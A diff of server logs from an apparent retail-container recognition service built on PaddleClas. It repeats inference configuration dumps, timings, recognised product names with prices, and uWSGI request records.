enable_mkldnn : True +2022-01-29 13:58:47 INFO: enable_profile : False +2022-01-29 13:58:47 INFO: gpu_mem : 8000 +2022-01-29 13:58:47 INFO: image_shape : [3, 640, 640] +2022-01-29 13:58:47 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 13:58:47 INFO: ir_optim : True +2022-01-29 13:58:47 INFO: labe_list : ['foreground'] +2022-01-29 13:58:47 INFO: max_det_results : 5 +2022-01-29 13:58:47 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 13:58:47 INFO: rec_nms_thresold : 0.05 +2022-01-29 13:58:47 INFO: threshold : 0.2 +2022-01-29 13:58:47 INFO: use_fp16 : False +2022-01-29 13:58:47 INFO: use_gpu : False +2022-01-29 13:58:47 INFO: use_tensorrt : False +2022-01-29 13:58:47 INFO: IndexProcess : +2022-01-29 13:58:47 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 13:58:47 INFO: return_k : 5 +2022-01-29 13:58:47 INFO: score_thres : 0.5 +2022-01-29 13:58:47 INFO: RecPostProcess : None +2022-01-29 13:58:47 INFO: RecPreProcess : +2022-01-29 13:58:47 INFO: transform_ops : +2022-01-29 13:58:47 INFO: ResizeImage : +2022-01-29 13:58:47 INFO: size : 224 +2022-01-29 13:58:47 INFO: NormalizeImage : +2022-01-29 13:58:47 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 13:58:47 INFO: order : +2022-01-29 13:58:47 INFO: scale : 0.00392157 +2022-01-29 13:58:47 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 13:58:47 INFO: ToCHWImage : None +Inference: 375.9171962738037 ms per batch image +[{'bbox': [204, 14, 443, 456], 'rec_docs': '小度充电宝', 'rec_scores': 0.5565247}] +{'bbox': [204, 14, 443, 456], 'rec_docs': '小度充电宝', 'rec_scores': 0.5565247} +234 +["{'bbox': [204, 14, 443, 456], 'rec_docs': '小度充电宝', 'rec_scores': 0.5565247}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13129|app: 0|req: 179/193] 49.79.98.245 () {34 vars in 447 bytes} [Sat Jan 29 13:58:46 2022] POST /reference_client/ => generated 126 bytes in 3463 msecs (HTTP/1.1 200) 5 headers in 158 bytes (22 switches on core 0) +req +2022-01-29 14:28:35 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 14:28:35 INFO: DetPostProcess : +2022-01-29 14:28:35 INFO: DetPreProcess : +2022-01-29 14:28:35 INFO: transform_ops : +2022-01-29 14:28:35 INFO: DetResize : +2022-01-29 14:28:35 INFO: interp : 2 +2022-01-29 14:28:35 INFO: keep_ratio : False +2022-01-29 14:28:35 INFO: target_size : [640, 640] +2022-01-29 14:28:35 INFO: DetNormalizeImage : +2022-01-29 14:28:35 INFO: is_scale : True +2022-01-29 14:28:35 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 14:28:35 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 14:28:35 INFO: DetPermute : +2022-01-29 14:28:35 INFO: Global : +2022-01-29 14:28:35 INFO: batch_size : 1 +2022-01-29 14:28:35 INFO: cpu_num_threads : 1 +2022-01-29 14:28:35 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 14:28:35 INFO: enable_benchmark : True +2022-01-29 14:28:35 INFO: enable_mkldnn : True +2022-01-29 14:28:35 INFO: enable_profile : False +2022-01-29 14:28:35 INFO: gpu_mem : 8000 +2022-01-29 14:28:35 INFO: image_shape : [3, 640, 640] +2022-01-29 14:28:35 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 14:28:35 INFO: ir_optim : True +2022-01-29 14:28:35 INFO: labe_list : ['foreground'] +2022-01-29 14:28:35 INFO: max_det_results : 5 +2022-01-29 14:28:35 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 14:28:35 INFO: rec_nms_thresold : 0.05 +2022-01-29 14:28:35 INFO: threshold : 0.2 +2022-01-29 14:28:35 INFO: use_fp16 : False +2022-01-29 14:28:35 INFO: use_gpu : False +2022-01-29 14:28:35 INFO: use_tensorrt : False +2022-01-29 14:28:35 INFO: IndexProcess : +2022-01-29 14:28:35 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 14:28:35 INFO: return_k : 5 +2022-01-29 14:28:35 INFO: score_thres : 0.5 +2022-01-29 14:28:35 INFO: RecPostProcess : None +2022-01-29 14:28:35 INFO: RecPreProcess : +2022-01-29 14:28:35 INFO: transform_ops : +2022-01-29 14:28:35 INFO: ResizeImage : +2022-01-29 14:28:35 INFO: size : 224 +2022-01-29 14:28:35 INFO: NormalizeImage : +2022-01-29 14:28:35 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 14:28:35 INFO: order : +2022-01-29 14:28:35 INFO: scale : 0.00392157 +2022-01-29 14:28:35 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 14:28:35 INFO: ToCHWImage : None +Inference: 378.2503604888916 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 5/10] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 03:54:46 2021] POST /reference_client/ => generated 98 bytes in 6186 msecs (HTTP/1.1 200) 5 headers in 157 bytes (12 switches on core 0) +[pid: 13129|app: 0|req: 180/194] 49.79.98.245 () {32 vars in 419 bytes} [Sat Jan 29 14:28:33 2022] POST /reference_client/ => generated 98 bytes in 3273 msecs (HTTP/1.1 200) 5 headers in 157 bytes (25 switches on core 0) req -2021-11-03 03:58:18 INFO: +2022-01-29 14:29:10 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -1796,77 +2066,191 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 03:58:18 INFO: DetPostProcess : -2021-11-03 03:58:18 INFO: DetPreProcess : -2021-11-03 03:58:18 INFO: transform_ops : -2021-11-03 03:58:18 INFO: DetResize : -2021-11-03 03:58:18 INFO: interp : 2 -2021-11-03 03:58:18 INFO: keep_ratio : False -2021-11-03 03:58:18 INFO: target_size : [640, 640] -2021-11-03 03:58:18 INFO: DetNormalizeImage : -2021-11-03 03:58:18 INFO: is_scale : True -2021-11-03 03:58:18 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:58:18 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:58:18 INFO: DetPermute : -2021-11-03 03:58:18 INFO: Global : -2021-11-03 03:58:18 INFO: batch_size : 1 -2021-11-03 03:58:18 INFO: cpu_num_threads : 10 -2021-11-03 03:58:18 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 03:58:18 INFO: enable_benchmark : True -2021-11-03 03:58:18 INFO: enable_mkldnn : True -2021-11-03 03:58:18 INFO: enable_profile : False -2021-11-03 03:58:18 INFO: gpu_mem : 8000 -2021-11-03 03:58:18 INFO: image_shape : [3, 640, 640] -2021-11-03 03:58:18 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 03:58:18 INFO: ir_optim : True -2021-11-03 03:58:18 INFO: labe_list : ['foreground'] -2021-11-03 03:58:18 INFO: max_det_results : 5 -2021-11-03 03:58:18 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 03:58:18 INFO: rec_nms_thresold : 0.05 -2021-11-03 03:58:18 INFO: threshold : 0.2 -2021-11-03 03:58:18 INFO: use_fp16 : False -2021-11-03 03:58:18 INFO: use_gpu : False -2021-11-03 03:58:18 INFO: use_tensorrt : False -2021-11-03 03:58:18 INFO: IndexProcess : -2021-11-03 03:58:18 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 03:58:18 INFO: return_k : 5 -2021-11-03 03:58:18 INFO: score_thres : 0.5 -2021-11-03 03:58:18 INFO: RecPostProcess : None -2021-11-03 03:58:18 INFO: RecPreProcess : -2021-11-03 03:58:18 INFO: transform_ops : -2021-11-03 03:58:18 INFO: ResizeImage : -2021-11-03 03:58:18 INFO: size : 224 -2021-11-03 03:58:18 INFO: NormalizeImage : -2021-11-03 03:58:18 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:58:18 INFO: order : -2021-11-03 03:58:18 INFO: scale : 0.00392157 -2021-11-03 03:58:18 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:58:18 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2410.8452796936035 ms per batch image +2022-01-29 14:29:10 INFO: DetPostProcess : +2022-01-29 14:29:10 INFO: DetPreProcess : +2022-01-29 14:29:10 INFO: transform_ops : +2022-01-29 14:29:10 INFO: DetResize : +2022-01-29 14:29:10 INFO: interp : 2 +2022-01-29 14:29:10 INFO: keep_ratio : False +2022-01-29 14:29:10 INFO: target_size : [640, 640] +2022-01-29 14:29:10 INFO: DetNormalizeImage : +2022-01-29 14:29:10 INFO: is_scale : True +2022-01-29 14:29:10 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 14:29:10 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 14:29:10 INFO: DetPermute : +2022-01-29 14:29:10 INFO: Global : +2022-01-29 14:29:10 INFO: batch_size : 1 +2022-01-29 14:29:10 INFO: cpu_num_threads : 1 +2022-01-29 14:29:10 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 14:29:10 INFO: enable_benchmark : True +2022-01-29 14:29:10 INFO: enable_mkldnn : True +2022-01-29 14:29:10 INFO: enable_profile : False +2022-01-29 14:29:10 INFO: gpu_mem : 8000 +2022-01-29 14:29:10 INFO: image_shape : [3, 640, 640] +2022-01-29 14:29:10 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 14:29:10 INFO: ir_optim : True +2022-01-29 14:29:10 INFO: labe_list : ['foreground'] +2022-01-29 14:29:10 INFO: max_det_results : 5 +2022-01-29 14:29:10 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 14:29:10 INFO: rec_nms_thresold : 0.05 +2022-01-29 14:29:10 INFO: threshold : 0.2 +2022-01-29 14:29:10 INFO: use_fp16 : False +2022-01-29 14:29:10 INFO: use_gpu : False +2022-01-29 14:29:10 INFO: use_tensorrt : False +2022-01-29 14:29:10 INFO: IndexProcess : +2022-01-29 14:29:10 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 14:29:10 INFO: return_k : 5 +2022-01-29 14:29:10 INFO: score_thres : 0.5 +2022-01-29 14:29:10 INFO: RecPostProcess : None +2022-01-29 14:29:10 INFO: RecPreProcess : +2022-01-29 14:29:10 INFO: transform_ops : +2022-01-29 14:29:10 INFO: ResizeImage : +2022-01-29 14:29:10 INFO: size : 224 +2022-01-29 14:29:10 INFO: NormalizeImage : +2022-01-29 14:29:10 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 14:29:10 INFO: order : +2022-01-29 14:29:10 INFO: scale : 0.00392157 +2022-01-29 14:29:10 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 14:29:10 INFO: ToCHWImage : None +Inference: 373.10314178466797 ms per batch image +[{'bbox': [253, 0, 525, 480], 'rec_docs': '小度充电宝', 'rec_scores': 0.7348937}] +{'bbox': [253, 0, 525, 480], 'rec_docs': '小度充电宝', 'rec_scores': 0.7348937} +234 +["{'bbox': [253, 0, 525, 480], 'rec_docs': '小度充电宝', 'rec_scores': 0.7348937}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13128|app: 0|req: 11/195] 49.79.98.245 () {32 vars in 418 bytes} [Sat Jan 29 14:29:09 2022] POST /reference_client/ => generated 126 bytes in 3101 msecs (HTTP/1.1 200) 5 headers in 158 bytes (21 switches on core 0) +req +2022-01-29 14:56:08 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 14:56:08 INFO: DetPostProcess : +2022-01-29 14:56:08 INFO: DetPreProcess : +2022-01-29 14:56:08 INFO: transform_ops : +2022-01-29 14:56:08 INFO: DetResize : +2022-01-29 14:56:08 INFO: interp : 2 +2022-01-29 14:56:08 INFO: keep_ratio : False +2022-01-29 14:56:08 INFO: target_size : [640, 640] +2022-01-29 14:56:08 INFO: DetNormalizeImage : +2022-01-29 14:56:08 INFO: is_scale : True +2022-01-29 14:56:08 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 14:56:08 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 14:56:08 INFO: DetPermute : +2022-01-29 14:56:08 INFO: Global : +2022-01-29 14:56:08 INFO: batch_size : 1 +2022-01-29 14:56:08 INFO: cpu_num_threads : 1 +2022-01-29 14:56:08 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 14:56:08 INFO: enable_benchmark : True +2022-01-29 14:56:08 INFO: enable_mkldnn : True +2022-01-29 14:56:08 INFO: enable_profile : False +2022-01-29 14:56:08 INFO: gpu_mem : 8000 +2022-01-29 14:56:08 INFO: image_shape : [3, 640, 640] +2022-01-29 14:56:08 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 14:56:08 INFO: ir_optim : True +2022-01-29 14:56:08 INFO: labe_list : ['foreground'] +2022-01-29 14:56:08 INFO: max_det_results : 5 +2022-01-29 14:56:08 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 14:56:08 INFO: rec_nms_thresold : 0.05 +2022-01-29 14:56:08 INFO: threshold : 0.2 +2022-01-29 14:56:08 INFO: use_fp16 : False +2022-01-29 14:56:08 INFO: use_gpu : False +2022-01-29 14:56:08 INFO: use_tensorrt : False +2022-01-29 14:56:08 INFO: IndexProcess : +2022-01-29 14:56:08 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 14:56:08 INFO: return_k : 5 +2022-01-29 14:56:08 INFO: score_thres : 0.5 +2022-01-29 14:56:08 INFO: RecPostProcess : None +2022-01-29 14:56:08 INFO: RecPreProcess : +2022-01-29 14:56:08 INFO: transform_ops : +2022-01-29 14:56:08 INFO: ResizeImage : +2022-01-29 14:56:08 INFO: size : 224 +2022-01-29 14:56:08 INFO: NormalizeImage : +2022-01-29 14:56:08 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 14:56:08 INFO: order : +2022-01-29 14:56:08 INFO: scale : 0.00392157 +2022-01-29 14:56:08 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 14:56:08 INFO: ToCHWImage : None +Inference: 373.73828887939453 ms per batch image +[{'bbox': [202, 59, 445, 475], 'rec_docs': '小度充电宝', 'rec_scores': 0.6655937}] +{'bbox': [202, 59, 445, 475], 'rec_docs': '小度充电宝', 'rec_scores': 0.6655937} +234 +["{'bbox': [202, 59, 445, 475], 'rec_docs': '小度充电宝', 'rec_scores': 0.6655937}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13129|app: 0|req: 181/196] 49.79.98.245 () {34 vars in 447 bytes} [Sat Jan 29 14:56:06 2022] POST /reference_client/ => generated 126 bytes in 3567 msecs (HTTP/1.1 200) 5 headers in 158 bytes (22 switches on core 0) +[pid: 13129|app: 0|req: 182/197] 83.97.20.34 () {30 vars in 329 bytes} [Sat Jan 29 16:09:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-01-29 16:11:03 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 16:11:03 INFO: DetPostProcess : +2022-01-29 16:11:03 INFO: DetPreProcess : +2022-01-29 16:11:03 INFO: transform_ops : +2022-01-29 16:11:03 INFO: DetResize : +2022-01-29 16:11:03 INFO: interp : 2 +2022-01-29 16:11:03 INFO: keep_ratio : False +2022-01-29 16:11:03 INFO: target_size : [640, 640] +2022-01-29 16:11:03 INFO: DetNormalizeImage : +2022-01-29 16:11:03 INFO: is_scale : True +2022-01-29 16:11:03 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 16:11:03 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 16:11:03 INFO: DetPermute : +2022-01-29 16:11:03 INFO: Global : +2022-01-29 16:11:03 INFO: batch_size : 1 +2022-01-29 16:11:03 INFO: cpu_num_threads : 1 +2022-01-29 16:11:03 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 16:11:03 INFO: enable_benchmark : True +2022-01-29 16:11:03 INFO: enable_mkldnn : True +2022-01-29 16:11:03 INFO: enable_profile : False +2022-01-29 16:11:03 INFO: gpu_mem : 8000 +2022-01-29 16:11:03 INFO: image_shape : [3, 640, 640] +2022-01-29 16:11:03 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 16:11:03 INFO: ir_optim : True +2022-01-29 16:11:03 INFO: labe_list : ['foreground'] +2022-01-29 16:11:03 INFO: max_det_results : 5 +2022-01-29 16:11:03 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 16:11:03 INFO: rec_nms_thresold : 0.05 +2022-01-29 16:11:03 INFO: threshold : 0.2 +2022-01-29 16:11:03 INFO: use_fp16 : False +2022-01-29 16:11:03 INFO: use_gpu : False +2022-01-29 16:11:03 INFO: use_tensorrt : False +2022-01-29 16:11:03 INFO: IndexProcess : +2022-01-29 16:11:03 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 16:11:03 INFO: return_k : 5 +2022-01-29 16:11:03 INFO: score_thres : 0.5 +2022-01-29 16:11:03 INFO: RecPostProcess : None +2022-01-29 16:11:03 INFO: RecPreProcess : +2022-01-29 16:11:03 INFO: transform_ops : +2022-01-29 16:11:03 INFO: ResizeImage : +2022-01-29 16:11:03 INFO: size : 224 +2022-01-29 16:11:03 INFO: NormalizeImage : +2022-01-29 16:11:03 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 16:11:03 INFO: order : +2022-01-29 16:11:03 INFO: scale : 0.00392157 +2022-01-29 16:11:03 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 16:11:03 INFO: ToCHWImage : None +Inference: 374.25684928894043 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 6/11] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 03:58:17 2021] POST /reference_client/ => generated 98 bytes in 6349 msecs (HTTP/1.1 200) 5 headers in 157 bytes (14 switches on core 0) -[pid: 32765|app: 0|req: 7/12] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 04:00:16 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 5/13] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 04:00:17 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 183/198] 101.83.69.232 () {34 vars in 448 bytes} [Sat Jan 29 16:11:02 2022] POST /reference_client/ => generated 98 bytes in 2938 msecs (HTTP/1.1 200) 5 headers in 157 bytes (21 switches on core 0) +[pid: 13128|app: 0|req: 12/199] 159.148.18.106 () {32 vars in 465 bytes} [Sat Jan 29 16:11:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) req -2021-11-03 04:01:39 INFO: +2022-01-29 16:11:38 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -1876,75 +2260,1531 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:01:39 INFO: DetPostProcess : -2021-11-03 04:01:39 INFO: DetPreProcess : -2021-11-03 04:01:39 INFO: transform_ops : -2021-11-03 04:01:39 INFO: DetResize : -2021-11-03 04:01:39 INFO: interp : 2 -2021-11-03 04:01:39 INFO: keep_ratio : False -2021-11-03 04:01:39 INFO: target_size : [640, 640] -2021-11-03 04:01:39 INFO: DetNormalizeImage : -2021-11-03 04:01:39 INFO: is_scale : True -2021-11-03 04:01:39 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:01:39 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:01:39 INFO: DetPermute : -2021-11-03 04:01:39 INFO: Global : -2021-11-03 04:01:39 INFO: batch_size : 1 -2021-11-03 04:01:39 INFO: cpu_num_threads : 10 -2021-11-03 04:01:39 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:01:39 INFO: enable_benchmark : True -2021-11-03 04:01:39 INFO: enable_mkldnn : True -2021-11-03 04:01:39 INFO: enable_profile : False -2021-11-03 04:01:39 INFO: gpu_mem : 8000 -2021-11-03 04:01:39 INFO: image_shape : [3, 640, 640] -2021-11-03 04:01:39 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:01:39 INFO: ir_optim : True -2021-11-03 04:01:39 INFO: labe_list : ['foreground'] -2021-11-03 04:01:39 INFO: max_det_results : 5 -2021-11-03 04:01:39 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:01:39 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:01:39 INFO: threshold : 0.2 -2021-11-03 04:01:39 INFO: use_fp16 : False -2021-11-03 04:01:39 INFO: use_gpu : False -2021-11-03 04:01:39 INFO: use_tensorrt : False -2021-11-03 04:01:39 INFO: IndexProcess : -2021-11-03 04:01:39 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:01:39 INFO: return_k : 5 -2021-11-03 04:01:39 INFO: score_thres : 0.5 -2021-11-03 04:01:39 INFO: RecPostProcess : None -2021-11-03 04:01:39 INFO: RecPreProcess : -2021-11-03 04:01:39 INFO: transform_ops : -2021-11-03 04:01:39 INFO: ResizeImage : -2021-11-03 04:01:39 INFO: size : 224 -2021-11-03 04:01:39 INFO: NormalizeImage : -2021-11-03 04:01:39 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:01:39 INFO: order : -2021-11-03 04:01:39 INFO: scale : 0.00392157 -2021-11-03 04:01:39 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:01:39 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2216.1033153533936 ms per batch image +2022-01-29 16:11:38 INFO: DetPostProcess : +2022-01-29 16:11:38 INFO: DetPreProcess : +2022-01-29 16:11:38 INFO: transform_ops : +2022-01-29 16:11:38 INFO: DetResize : +2022-01-29 16:11:38 INFO: interp : 2 +2022-01-29 16:11:38 INFO: keep_ratio : False +2022-01-29 16:11:38 INFO: target_size : [640, 640] +2022-01-29 16:11:38 INFO: DetNormalizeImage : +2022-01-29 16:11:38 INFO: is_scale : True +2022-01-29 16:11:38 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 16:11:38 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 16:11:38 INFO: DetPermute : +2022-01-29 16:11:38 INFO: Global : +2022-01-29 16:11:38 INFO: batch_size : 1 +2022-01-29 16:11:38 INFO: cpu_num_threads : 1 +2022-01-29 16:11:38 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 16:11:38 INFO: enable_benchmark : True +2022-01-29 16:11:38 INFO: enable_mkldnn : True +2022-01-29 16:11:38 INFO: enable_profile : False +2022-01-29 16:11:38 INFO: gpu_mem : 8000 +2022-01-29 16:11:38 INFO: image_shape : [3, 640, 640] +2022-01-29 16:11:38 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 16:11:38 INFO: ir_optim : True +2022-01-29 16:11:38 INFO: labe_list : ['foreground'] +2022-01-29 16:11:38 INFO: max_det_results : 5 +2022-01-29 16:11:38 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 16:11:38 INFO: rec_nms_thresold : 0.05 +2022-01-29 16:11:38 INFO: threshold : 0.2 +2022-01-29 16:11:38 INFO: use_fp16 : False +2022-01-29 16:11:38 INFO: use_gpu : False +2022-01-29 16:11:38 INFO: use_tensorrt : False +2022-01-29 16:11:38 INFO: IndexProcess : +2022-01-29 16:11:38 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 16:11:38 INFO: return_k : 5 +2022-01-29 16:11:38 INFO: score_thres : 0.5 +2022-01-29 16:11:38 INFO: RecPostProcess : None +2022-01-29 16:11:38 INFO: RecPreProcess : +2022-01-29 16:11:38 INFO: transform_ops : +2022-01-29 16:11:38 INFO: ResizeImage : +2022-01-29 16:11:38 INFO: size : 224 +2022-01-29 16:11:38 INFO: NormalizeImage : +2022-01-29 16:11:38 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 16:11:38 INFO: order : +2022-01-29 16:11:38 INFO: scale : 0.00392157 +2022-01-29 16:11:38 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 16:11:38 INFO: ToCHWImage : None +Inference: 380.3141117095947 ms per batch image +[{'bbox': [7, 13, 640, 475], 'rec_docs': '江小白', 'rec_scores': 0.5033179}] +{'bbox': [7, 13, 640, 475], 'rec_docs': '江小白', 'rec_scores': 0.5033179} +234 +["{'bbox': [7, 13, 640, 475], 'rec_docs': '江小白', 'rec_scores': 0.5033179}\n"] +['江小白'] +['江小白', '20'] +[pid: 13129|app: 0|req: 184/200] 101.83.69.232 () {34 vars in 449 bytes} [Sat Jan 29 16:11:37 2022] POST /reference_client/ => generated 114 bytes in 3002 msecs (HTTP/1.1 200) 5 headers in 158 bytes (18 switches on core 0) +req +2022-01-29 16:12:07 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 16:12:07 INFO: DetPostProcess : +2022-01-29 16:12:07 INFO: DetPreProcess : +2022-01-29 16:12:07 INFO: transform_ops : +2022-01-29 16:12:07 INFO: DetResize : +2022-01-29 16:12:07 INFO: interp : 2 +2022-01-29 16:12:07 INFO: keep_ratio : False +2022-01-29 16:12:07 INFO: target_size : [640, 640] +2022-01-29 16:12:07 INFO: DetNormalizeImage : +2022-01-29 16:12:07 INFO: is_scale : True +2022-01-29 16:12:07 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 16:12:07 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 16:12:07 INFO: DetPermute : +2022-01-29 16:12:07 INFO: Global : +2022-01-29 16:12:07 INFO: batch_size : 1 